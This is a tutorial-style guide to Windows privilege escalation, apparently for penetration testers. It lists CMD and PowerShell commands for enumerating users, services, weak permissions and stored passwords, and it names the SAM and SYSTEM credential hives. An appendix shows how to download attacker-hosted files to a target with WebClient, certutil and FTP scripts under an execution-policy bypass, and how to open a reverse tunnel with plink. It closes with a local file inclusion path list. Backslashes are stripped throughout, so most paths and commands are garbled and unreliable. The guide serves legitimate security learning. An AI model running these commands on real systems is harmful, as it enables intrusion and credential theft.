Introduction

Privilege escalation always comes down to proper enumeration. But to accomplish proper enumeration you need to know what to check and look for. This takes familiarity with systems that normally comes along with experience. At first privilege escalation can seem like a daunting task, but after a while you start to filter through what is normal and what isn’t. It eventually becomes easier to know what to look for rather than digging through everything hoping to find that needle in the haystack. Hopefully this guide will provide a good foundation to build upon and get you started.

This guide is influenced by g0tm1lk’s Basic Linux Privilege Escalation, which at some point you should have already seen and used. I wanted to try to mirror his guide, except for Windows. So this guide will mostly focus on the enumeration aspect.

Note: I am not an expert and still learning myself.

Guide Layout

In each section I first provide the old trusted CMD commands and then also a Powershell equivalent for posterity sake. It’s good to have both tools under your belt and Powershell is much more versatile for scripting than the traditional CMD. However there isn’t a Powershell equivalent for everything (or CMD is still simply easier/better on certain things), so some sections will only contain regular CMD commands.

Operating System

What is the OS and architecture? Is it missing any patches?

systeminfo wmic qfe

Is there anything interesting in environment variables? A domain controller in LOGONSERVER?

set

Get-ChildItem Env: | ft Key,Value

Are there any other connected drives?

net use wmic logicaldisk get caption,description,providername

Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.CoreFileSystem"}| ft Name,Root

Users

Who are you?

whoami echo %USERNAME%

$env:UserName

What users are on the system? Any old user profiles that weren’t cleaned up?

net users dir /b /ad "C:Users" dir /b /ad "C:Documents and Settings" # Windows XP and below

Get-LocalUser | ft Name,Enabled,LastLogonGet-ChildItem C:Users -Force | select Name

Is anyone else logged in?

qwinsta

What groups are on the system?

net localgroup

Get-LocalGroup | ft Name

Are any of the users in the Administrators group?

net localgroup Administrators

Get-LocalGroupMember Administrators | ft Name, PrincipalSource

Anything in the Registry for User Autologon?

reg query "HKLMSOFTWAREMicrosoftWindows NTCurrentversionWinlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword"

Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindows NTCurrentVersionWinLogon' | select "Default*"

Anything interesting in Credential Manager?

cmdkey /list

Can we access SAM and SYSTEM files?

%SYSTEMROOT%repairSAM %SYSTEMROOT%System32configRegBackSAM %SYSTEMROOT%System32configSAM %SYSTEMROOT%repairsystem %SYSTEMROOT%System32configSYSTEM %SYSTEMROOT%System32configRegBacksystem

Programs, Processes, and Services

What software is installed?

dir /a "C:Program Files" dir /a "C:Program Files (x86)" reg query HKEY_LOCAL_MACHINESOFTWARE

Get-ChildItem 'C:Program Files', 'C:Program Files (x86)' | ft Parent,Name,LastWriteTimeGet-ChildItem -path Registry::HKEY_LOCAL_MACHINESOFTWARE | ft Name

Are there any weak folder or file permissions?

Full Permissions for Everyone or Users on Program Folders?

icacls "C:Program Files*" 2>nul | findstr "(F)" | findstr "Everyone" icacls "C:Program Files (x86)*" 2>nul | findstr "(F)" | findstr "Everyone"  icacls "C:Program Files*" 2>nul | findstr "(F)" | findstr "BUILTINUsers" icacls "C:Program Files (x86)*" 2>nul | findstr "(F)" | findstr "BUILTINUsers"  

Modify Permissions for Everyone or Users on Program Folders?

icacls "C:Program Files*" 2>nul | findstr "(M)" | findstr "Everyone" icacls "C:Program Files (x86)*" 2>nul | findstr "(M)" | findstr "Everyone"  icacls "C:Program Files*" 2>nul | findstr "(M)" | findstr "BUILTINUsers"  icacls "C:Program Files (x86)*" 2>nul | findstr "(M)" | findstr "BUILTINUsers"  

Get-ChildItem 'C:Program Files*','C:Program Files (x86)*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'Everyone'} } catch {}} Get-ChildItem 'C:Program Files*','C:Program Files (x86)*' | % { try { Get-Acl $_ -EA SilentlyContinue | Where {($_.Access|select -ExpandProperty IdentityReference) -match 'BUILTINUsers'} } catch {}} 

You can also upload accesschk from Sysinternals to check for writeable folders and files.

accesschk.exe -qwsu "Everyone" * accesschk.exe -qwsu "Authenticated Users" * accesschk.exe -qwsu "Users" *

What are the running processes/services on the system? Is there an inside service not exposed? If so, can we open it? See Port Forwarding in Appendix.

tasklist /svc tasklist /v net start sc query

Get-Process | ft ProcessName,IdGet-Service

Any weak service permissions? Can we reconfigure anything? Again, upload accesschk.

accesschk.exe -uwcqv "Everyone" * accesschk.exe -uwcqv "Authenticated Users" * accesschk.exe -uwcqv "Users" *

Are there any unquoted service paths?

wmic service get name,displayname,pathname,startmode 2>nul |findstr /i "Auto" 2>nul |findstr /i /v "C:Windows\" 2>nul |findstr /i /v """

What scheduled tasks are there? Anything custom implemented?

schtasks /query /fo LIST 2>nul | findstr TaskName dir C:windowstasks

Get-ScheduledTask | ft TaskName, State

What is ran at startup?

wmic startup get caption,command reg query HKLMSoftwareMicrosoftWindowsCurrentVersionRun reg query HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnce reg query HKCUSoftwareMicrosoftWindowsCurrentVersionRun reg query HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce dir "C:Documents and SettingsAll UsersStart MenuProgramsStartup" dir "C:Documents and Settings%username%Start MenuProgramsStartup"

Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRun'Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionRunOnce'Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun'Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRunOnce'Get-ChildItem "C:UsersAll UsersStart MenuProgramsStartup"Get-ChildItem "C:Users$env:USERNAMEStart MenuProgramsStartup"

Is AlwaysInstallElevated enabled? I have not ran across this but it doesn’t hurt to check.

reg query HKCUSOFTWAREPoliciesMicrosoftWindowsInstaller /v AlwaysInstallElevated

Networking

What NICs are connected? Are there multiple networks?

ipconfig /all

Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address

What routes do we have?

route print

Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex

Anything in the ARP cache?

arp -a

Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State

Are there connections to other hosts?

netstat -ano

Anything in the hosts file?

C:WINDOWSSystem32driversetchosts

Is the firewall turned on? If so what’s configured?

netsh firewall show state netsh firewall show config netsh advfirewall firewall show rule name=all netsh advfirewall export "firewall.txt"

Any other interesting interface configurations?

netsh dump

Are there any SNMP configurations?

reg query HKLMSYSTEMCurrentControlSetServicesSNMP /s

Get-ChildItem -path HKLM:SYSTEMCurrentControlSetServicesSNMP -Recurse

Interesting Files and Sensitive Information

This section may be a little noisy so you may want to output commands into txt files to review and parse as you wish.

Any passwords in the registry?

reg query HKCU /f password /t REG_SZ /s reg query HKLM /f password /t REG_SZ /s  

Are there sysprep or unattend files available that weren’t cleaned up?

dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul

Get-Childitem –Path C: -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")}

If the server is an IIS webserver, what’s in inetpub? Any hidden directories? web.config files?

dir /a C:inetpub dir /s web.config C:WindowsSystem32inetsrvconfigapplicationHost.config

Get-Childitem –Path C:inetpub -Include web.config -File -Recurse -ErrorAction SilentlyContinue

What’s in the IIS Logs?

C:inetpublogsLogFilesW3SVC1u_ex[YYMMDD].log C:inetpublogsLogFilesW3SVC2u_ex[YYMMDD].log C:inetpublogsLogFilesFTPSVC1u_ex[YYMMDD].log C:inetpublogsLogFilesFTPSVC2u_ex[YYMMDD].log

Is XAMPP, Apache, or PHP installed? Any there any XAMPP, Apache, or PHP configuration files?

dir /s php.ini httpd.conf httpd-xampp.conf my.ini my.cnf

Get-Childitem –Path C: -Include php.ini,httpd.conf,httpd-xampp.conf,my.ini,my.cnf -File -Recurse -ErrorAction SilentlyContinue

Any Apache web logs?

dir /s access.log error.log

Get-Childitem –Path C: -Include access.log,error.log -File -Recurse -ErrorAction SilentlyContinue

Any interesting files to look at? Possibly inside User directories (Desktop, Documents, etc)?

dir /s *pass* == *vnc* == *.config* 2>nul

Get-Childitem –Path C:Users -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue

Files containing password inside them?

findstr /si password *.xml *.ini *.txt *.config 2>nul

Get-ChildItem C:* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password"

Appendix

Transferring Files

At some point during privilege escalation you will need to get files onto your target. Below are some easy ways to do so.

Powershell Cmdlet (Powershell 3.0 and higher)

Invoke-WebRequest "https://myserver/filename" -OutFile "C:WindowsTempfilename"

Powershell One-Liner

(New-Object System.Net.WebClient).DownloadFile("https://myserver/filename", "C:WindowsTempfilename") 

Powershell Script

echo $webclient = New-Object System.Net.WebClient >>wget.ps1echo $url = "http://IPADDRESS/file.exe" >>wget.ps1echo $file = "output-file.exe" >>wget.ps1echo $webclient.DownloadFile($url,$file) >>wget.ps1 		 powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1

Non-interactive FTP via text file. Useful for when you only have limited command execution.

echo open 10.10.10.11 21> ftp.txt echo USER username>> ftp.txt echo mypassword>> ftp.txt echo bin>> ftp.txt echo GET filename>> ftp.txt echo bye>> ftp.txt 		 ftp -v -n -s:ftp.txt

CertUtil

certutil.exe -urlcache -split -f https://myserver/filename outputfilename

Port Forwarding

This is useful for exposing inside services that aren’t available from outside the machine, normally due to firewall settings.

Upload plink.exe to target.

Start SSH on your attacking machine.

For example to expose SMB, on the target run:

plink.exe -l root -pw password -R 445:127.0.0.1:445 YOURIPADDRESS

Note: As of the Fall Creators Update for Windows 10, OpenSSH has been introduced in beta for Windows, so I expect one day we may be able to use just regular old SSH commands for port forwarding, depending on if it’s enabled.

Local File Inclusion List

This is not an exhaustive list, installation directories will vary, I’ve only listed common ones.

C:Apacheconfhttpd.conf C:Apachelogsaccess.log C:Apachelogserror.log C:Apache2confhttpd.conf C:Apache2logsaccess.log C:Apache2logserror.log C:Apache22confhttpd.conf C:Apache22logsaccess.log C:Apache22logserror.log C:Apache24confhttpd.conf C:Apache24logsaccess.log C:Apache24logserror.log C:Documents and SettingsAdministratorNTUser.dat C:phpphp.ini C:php4php.ini C:php5php.ini C:php7php.ini C:Program Files (x86)Apache GroupApacheconfhttpd.conf C:Program Files (x86)Apache GroupApachelogsaccess.log C:Program Files (x86)Apache GroupApachelogserror.log C:Program Files (x86)Apache GroupApache2confhttpd.conf C:Program Files (x86)Apache GroupApache2logsaccess.log C:Program Files (x86)Apache GroupApache2logserror.log c:Program Files (x86)phpphp.ini" C:Program FilesApache GroupApacheconfhttpd.conf C:Program FilesApache GroupApacheconflogsaccess.log C:Program FilesApache GroupApacheconflogserror.log C:Program FilesApache GroupApache2confhttpd.conf C:Program FilesApache GroupApache2conflogsaccess.log C:Program FilesApache GroupApache2conflogserror.log C:Program FilesFileZilla ServerFileZilla Server.xml C:Program FilesMySQLmy.cnf C:Program FilesMySQLmy.ini C:Program FilesMySQLMySQL Server 5.0my.cnf C:Program FilesMySQLMySQL Server 5.0my.ini C:Program FilesMySQLMySQL Server 5.1my.cnf C:Program FilesMySQLMySQL Server 5.1my.ini C:Program FilesMySQLMySQL Server 5.5my.cnf C:Program FilesMySQLMySQL Server 5.5my.ini C:Program FilesMySQLMySQL Server 5.6my.cnf C:Program FilesMySQLMySQL Server 5.6my.ini C:Program FilesMySQLMySQL Server 5.7my.cnf C:Program FilesMySQLMySQL Server 5.7my.ini C:Program Filesphpphp.ini C:UsersAdministratorNTUser.dat C:WindowsdebugNetSetup.LOG C:WindowsPantherUnattendUnattended.xml C:WindowsPantherUnattended.xml C:Windowsphp.ini C:WindowsrepairSAM C:Windowsrepairsystem C:WindowsSystem32configAppEvent.evt C:WindowsSystem32configRegBackSAM C:WindowsSystem32configRegBacksystem C:WindowsSystem32configSAM C:WindowsSystem32configSecEvent.evt C:WindowsSystem32configSysEvent.evt C:WindowsSystem32configSYSTEM C:WindowsSystem32driversetchosts C:WindowsSystem32winevtLogsApplication.evtx C:WindowsSystem32winevtLogsSecurity.evtx C:WindowsSystem32winevtLogsSystem.evtx C:Windowswin.ini  C:xamppapacheconfextrahttpd-xampp.conf C:xamppapacheconfhttpd.conf C:xamppapachelogsaccess.log C:xamppapachelogserror.log C:xamppFileZillaFTPFileZilla Server.xml C:xamppMercuryMailMERCURY.INI C:xamppmysqlbinmy.ini C:xamppphpphp.ini C:xamppsecuritywebdav.htpasswd C:xamppsendmailsendmail.ini C:xampptomcatconfserver.xml